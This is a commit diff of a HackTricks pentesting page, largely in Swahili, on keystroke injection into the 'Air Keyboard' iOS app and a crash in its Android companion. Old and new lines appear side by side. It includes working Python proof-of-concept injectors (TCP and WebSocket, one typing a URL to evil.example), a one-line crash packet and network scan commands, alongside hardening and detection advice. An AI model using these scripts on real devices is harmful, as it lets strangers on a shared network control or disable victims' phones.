maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/mobile-pentesting/ios-pentesting/air-keyboard-remote-in

Browse Source
This commit is contained in:
Translator 2025-07-30 14:16:26 +00:00
parent ef705ef703
commit e1b916095d
1 changed files with 113 additions and 31 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

144
src/mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.md
View File

@ -1,18 +1,26 @@
# Air Keyboard Remote Input Injection (Unauthenticated TCP Listener) # Air Keyboard Remote Input Injection (Unauthenticated TCP / WebSocket Listener)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
## TL;DR ## TL;DR
Toleo la iOS la programu ya kibiashara "Air Keyboard" (App Store ID 6463187929) linafungua **huduma ya TCP isiyo na usalama kwenye bandari 8888** inayokubali fremu za funguo **bila uthibitisho wowote**. Kila kifaa kwenye mtandao wa Wi-Fi sawa kinaweza kuungana na bandari hiyo na kuingiza pembejeo za kibodi zisizo na mipaka kwenye simu ya mwathirika, na kufikia **kukamata mwingiliano wa mbali kabisa**. Toleo la iOS la programu ya kibiashara **“Air Keyboard”** (App Store ID 6463187929) linaonyesha huduma ya mtandao wa ndani ambayo **inapokea fremu za funguo bila uthibitisho wowote au uthibitisho wa chanzo**. Kulingana na toleo lililowekwa huduma hiyo ni:
Toleo la Android linalofanana linakusikiliza kwenye **bandari 55535**. Linafanya mkono dhaifu wa AES-ECB, lakini takataka iliyoundwa inasababisha **kosa lisiloshughulikiwa katika utaratibu wa ufichuzi wa OpenSSL**, ikisababisha huduma ya nyuma kuanguka (**DoS**). * **≤ 1.0.4** msikilizaji wa TCP wa kawaida kwenye **bandari 8888** inayotarajia kichwa cha urefu wa byte 2 kinachofuatiwa na *device-id* na mzigo wa ASCII.
* **≥ 1.0.5 (Juni 2025)** msikilizaji wa **WebSocket** kwenye *bandari hiyo hiyo* (**8888**) inayochambua funguo za **JSON** kama `{"type":1,"text":"…"}`.
## 1. Service Discovery Kila kifaa kwenye Wi-Fi / subnet hiyo hiyo kinaweza hivyo **kuingiza pembejeo za kibodi zisizo na mipaka kwenye simu ya mwathirika, kufikia utekaji wa mwingiliano wa mbali**.
Kijengwa cha Android kinachosindikiza kinakusikiliza kwenye **bandari 55535**. Kinafanya mkono dhaifu wa AES-ECB lakini takataka iliyoundwa bado inasababisha **kosa lisiloshughulikiwa ndani ya OpenSSL**, ikisababisha huduma ya nyuma kuanguka (**DoS**).
> Uthibitisho wa usalama **bado haujarekebishwa wakati wa kuandika (Julai 2025)** na programu hiyo inapatikana bado kwenye Duka la Programu.
---
## 1. Huduma ya Ugunduzi
Scan mtandao wa ndani na utafute bandari mbili zilizowekwa zinazotumiwa na programu: Scan mtandao wa ndani na utafute bandari mbili zilizowekwa zinazotumiwa na programu:
```bash ```bash
# iOS (input-injection) # iOS (unauthenticated input-injection)
nmap -p 8888 --open 192.168.1.0/24 nmap -p 8888 --open 192.168.1.0/24
# Android (weakly-authenticated service) # Android (weakly-authenticated service)
@ -20,72 +28,146 @@ nmap -p 55535 --open 192.168.1.0/24
``` ```
Katika simu za Android unaweza kubaini kifurushi kinachohusika kwa ndani: Katika simu za Android unaweza kubaini kifurushi kinachohusika kwa ndani:
```bash ```bash
adb shell netstat -tulpn | grep 55535 # no root required on emulator adb shell netstat -tulpn | grep 55535 # no root required on emulator
# rooted device / Termux # rooted device / Termux
netstat -tulpn | grep LISTEN netstat -tulpn | grep LISTEN
ls -l /proc/<PID>/cmdline # map PID → package name ls -l /proc/<PID>/cmdline # map PID → package name
``` ```
## 2. Muundo wa Frame (iOS) Katika **iOS iliyovunjwa** unaweza kufanya kitu kinachofanana na `lsof -i -nP | grep LISTEN | grep 8888`.
Binary inafichua mantiki ifuatayo ya uchambuzi ndani ya utaratibu wa `handleInputFrame()`: ---
## 2. Maelezo ya Protokali (iOS)
### 2.1 Urithi (≤ 1.0.4) fremu za binary za kawaida
``` ```
[length (2 bytes little-endian)] [length (2 bytes little-endian)]
[device_id (1 byte)] [device_id (1 byte)]
[payload ASCII keystrokes] [payload ASCII keystrokes]
``` ```
Urefu ulioelezwa unajumuisha byte ya `device_id` **lakini sio** kichwa cha byte mbili yenyewe. Ilani ya *urefu* inajumuisha byte ya `device_id` **lakini sio** kichwa cha byte mbili yenyewe.
### 2.2 Sasa (≥ 1.0.5) JSON kupitia WebSocket
Toleo 1.0.5 lilihamishwa kimya kimya kwenda WebSockets huku likihifadhi nambari ya bandari bila kubadilisha. Kichocheo kidogo cha funguo kinaonekana kama:
```json
{
"type": 1, // 1 = insert text, 2 = special key
"text": "open -a Calculator\n",
"mode": 0,
"shiftKey": false,
"selectionStart": 0,
"selectionEnd": 0
}
```
Hakuna mkono wa mkono, token au saini inayohitajika - kitu cha kwanza cha JSON tayari kinachochea tukio la UI.
---
## 3. Utekelezaji PoC ## 3. Utekelezaji PoC
### 3.1 Kulenga ≤ 1.0.4 (raw TCP)
```python ```python
#!/usr/bin/env python3 #!/usr/bin/env python3
"""Inject arbitrary keystrokes into Air Keyboard for iOS""" """Inject arbitrary keystrokes into Air Keyboard ≤ 1.0.4 (TCP mode)"""
import socket, sys import socket, sys
target_ip = sys.argv[1] # e.g. 192.168.1.50 target_ip = sys.argv[1] # e.g. 192.168.1.50
keystrokes = b"open -a Calculator\n" # payload visible to the user keystrokes = b"open -a Calculator\n" # payload visible to the user
frame = bytes([(len(keystrokes)+1) & 0xff, (len(keystrokes)+1) >> 8]) frame = bytes([(len(keystrokes)+1) & 0xff, (len(keystrokes)+1) >> 8])
frame += b"\x01" # device_id = 1 (hard-coded) frame += b"\x01" # device_id = 1 (hard-coded)
frame += keystrokes frame += keystrokes
with socket.create_connection((target_ip, 8888)) as s: with socket.create_connection((target_ip, 8888)) as s:
s.sendall(frame) s.sendall(frame)
print("Injected", keystrokes) print("[+] Injected", keystrokes)
``` ```
Any printable ASCII (including `\n`, `\r`, special keys, etc.) can be sent, effectively granting the attacker the same power as physical user input: launching apps, sending IMs, visiting phishing URLs, etc. ### 3.2 Kulenga ≥ 1.0.5 (WebSocket)
```python
#!/usr/bin/env python3
"""Inject keystrokes into Air Keyboard ≥ 1.0.5 (WebSocket mode)"""
import json, sys, websocket # `pip install websocket-client`
target_ip = sys.argv[1]
ws = websocket.create_connection(f"ws://{target_ip}:8888")
ws.send(json.dumps({
"type": 1,
"text": "https://evil.example\n",
"mode": 0,
"shiftKey": False,
"selectionStart": 0,
"selectionEnd": 0
}))
ws.close()
print("[+] URL opened on target browser")
```
*ASCII yoyote inayoweza kuchapishwa — ikiwa ni pamoja na line-feeds, tabs na funguo nyingi maalum — inaweza kutumwa, ikimpa mshambuliaji nguvu sawa na ingizo la mtumiaji wa kimwili: kuzindua programu, kutuma IMs, kufungua URL za uharibifu, kubadilisha mipangilio, n.k.*
---
## 4. Android Companion Denial-of-Service ## 4. Android Companion Denial-of-Service
The Android port (55535) expects a 4-character password encrypted with a **hard-coded AES-128-ECB key** followed by a random nonce. Parsing errors bubble up to `AES_decrypt()` and are not caught, terminating the listener thread. A single malformed packet is therefore enough to keep legitimate users disconnected until the process is relaunched. Bandari ya Android (55535) inatarajia **neno la siri la herufi 4 lililofichwa kwa kutumia funguo za AES-128-ECB zilizowekwa kwa ngumu** ikifuatiwa na nonce ya nasibu. Makosa ya uchambuzi yanapanda hadi `AES_decrypt()` na hayakamatwi, yakimaliza nyuzi za msikilizaji. Paket moja iliyo na makosa inatosha kuwafanya watumiaji halali wawe nje ya mtandao hadi mchakato urudiwa.
```python ```python
import socket import socket
socket.create_connection((victim, 55535)).send(b"A"*32) # minimal DoS socket.create_connection((victim, 55535)).send(b"A"*32) # minimal DoS
``` ```
## 5. Sababu Kuu ---
## 5. Programu Zinazohusiana Mfano wa Mara kwa Mara wa Kupinga
Air Keyboard **siyo kesi ya pekee**. Programu nyingine za simu za “remote keyboard/mouse” zimekuja na kasoro hiyo hiyo:
* **Telepad ≤ 1.0.7** CVE-2022-45477/78 inaruhusu utekelezaji wa amri zisizo na uthibitisho na uandishi wa funguo za maandiko wazi.
* **PC Keyboard ≤ 30** CVE-2022-45479/80 RCE isiyo na uthibitisho & ufuatiliaji wa trafiki.
* **Lazy Mouse ≤ 2.0.1** CVE-2022-45481/82/83 hakuna-siri ya chaguo-msingi, PIN dhaifu ya nguvu na uvujaji wa maandiko wazi.
Mifano hii inaonyesha kutokujali kwa mfumo wa **uso wa mashambulizi yanayoelekezwa kwenye mitandao katika programu za simu**.
---
## 6. Sababu za Msingi
1. **Hakuna ukaguzi wa asili / uaminifu** kwenye fremu zinazokuja (iOS). 1. **Hakuna ukaguzi wa asili / uaminifu** kwenye fremu zinazokuja (iOS).
2. **Matumizi mabaya ya cryptographic** (funguo za kudumu, ECB, ukosefu wa uthibitisho wa urefu) na **ukosefu wa usimamizi wa makosa** (Android). 2. **Matumizi mabaya ya cryptographic** (funguo ya kudumu, ECB, ukosefu wa uthibitisho wa urefu) na **ukosefu wa usimamizi wa makosa** (Android).
3. **Haki ya Mtumiaji ya Mtandao wa Mitaa ≠ usalama** iOS inahitaji idhini ya wakati wa kukimbia kwa trafiki ya LAN, lakini haitoi uthibitisho sahihi.
## 6. Njia za Kupunguza na Wazo za Kuimarisha ---
* Kamwe usifichue huduma zisizo na uthibitisho kwenye simu ya mkononi. ## 7. Kuimarisha & Hatua za Kijamii
* Pata siri za kifaa kila wakati wakati wa kuanzisha na uziangaliye kabla ya kushughulikia ingizo.
* Fungamanisha msikilizaji na `127.0.0.1` na tumia usafirishaji wa siri, unaothibitishwa kwa pamoja (mfano, TLS, Noise) kwa udhibiti wa mbali. Mapendekezo ya waendelezaji:
* Gundua bandari zisizotarajiwa zilizo wazi wakati wa mapitio ya usalama wa simu (`netstat`, `lsof`, `frida-trace` kwenye `socket()` n.k.).
* Kama mtumiaji wa mwisho: ondoa Air Keyboard au itumie tu kwenye mitandao ya Wi-Fi iliyothibitishwa na iliyotengwa. * Fungamanisha msikilizaji na **`127.0.0.1`** na tunnel kupitia **mTLS** au **Noise XX** ikiwa udhibiti wa mbali unahitajika.
* Pata **siri za kifaa kila wakati wakati wa kuanzisha** (mfano, QR code au PIN ya Kuunganisha) na kulazimisha *uthibitisho wa pamoja* kabla ya kushughulikia ingizo.
* Adopt **Apple Network Framework** na *NWListener* + TLS badala ya soketi za kawaida.
* Tekeleza **ukaguzi wa akili wa urefu** na usimamizi wa makosa ulioandaliwa wakati wa kufungua au kufasiri fremu.
Mafanikio ya haraka ya Blue-/Red-Team:
* **Uwindaji wa Mtandao:** `sudo nmap -n -p 8888,55535 --open 192.168.0.0/16` au chujio cha Wireshark `tcp.port == 8888`.
* **Ukaguzi wa wakati wa kukimbia:** Skripti ya Frida inashikilia `socket()`/`NWConnection` ili orodhesha wasikilizaji wasiotarajiwa.
* **Ripoti ya Faragha ya Programu ya iOS (Mipangilio ▸ Faragha & Usalama ▸ Ripoti ya Faragha ya Programu)** inaonyesha programu zinazowasiliana na anwani za LAN muhimu kwa kugundua huduma za uasi.
* **Mobile EDRs** zinaweza kuongeza sheria rahisi za Yara-L kwa funguo za JSON `"selectionStart"`, `"selectionEnd"` ndani ya mzigo wa TCP wa maandiko wazi kwenye bandari 8888.
---
## Karatasi ya Udhibiti (Pentesters) ## Karatasi ya Udhibiti (Pentesters)
```bash ```bash
# Quick one-liner to locate vulnerable devices in a /24 # Locate vulnerable devices in a /24 and print IP + list of open risky ports
nmap -n -p 8888,55535 --open 192.168.1.0/24 -oG - | awk '/Ports/{print $2,$3,$4}' nmap -n -p 8888,55535 --open 192.168.1.0/24 -oG - \
| awk '/Ports/{print $2 " " $4}'
# Inspect running sockets on a connected Android target # Inspect running sockets on a connected Android target
adb shell "for p in $(lsof -PiTCP -sTCP:LISTEN -n -t); do echo -n \"$p → "; cat /proc/$p/cmdline; done" adb shell "for p in $(lsof -PiTCP -sTCP:LISTEN -n -t); do \
echo -n \"$p → \"; cat /proc/$p/cmdline; done"
``` ```
---
## Marejeo ## Marejeo
- [Uthibitisho wa Uwezo wa Kuingilia Kuingia kwa Mbali katika Programu ya Air Keyboard iOS Bado Haijarekebishwa](https://www.mobile-hacker.com/2025/07/17/remote-input-injection-vulnerability-in-air-keyboard-ios-app-still-unpatched/) - [Exploit-DB 52333 Air Keyboard iOS App 1.0.5 Remote Input Injection](https://www.exploit-db.com/exploits/52333)
- [CXSecurity taarifa WLB-2025060015](https://cxsecurity.com/issue/WLB-2025060015) - [Mobile-Hacker Blog (17 Jul 2025) Remote Input Injection Vulnerability in Air Keyboard iOS App Still Unpatched](https://www.mobile-hacker.com/2025/07/17/remote-input-injection-vulnerability-in-air-keyboard-ios-app-still-unpatched/)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}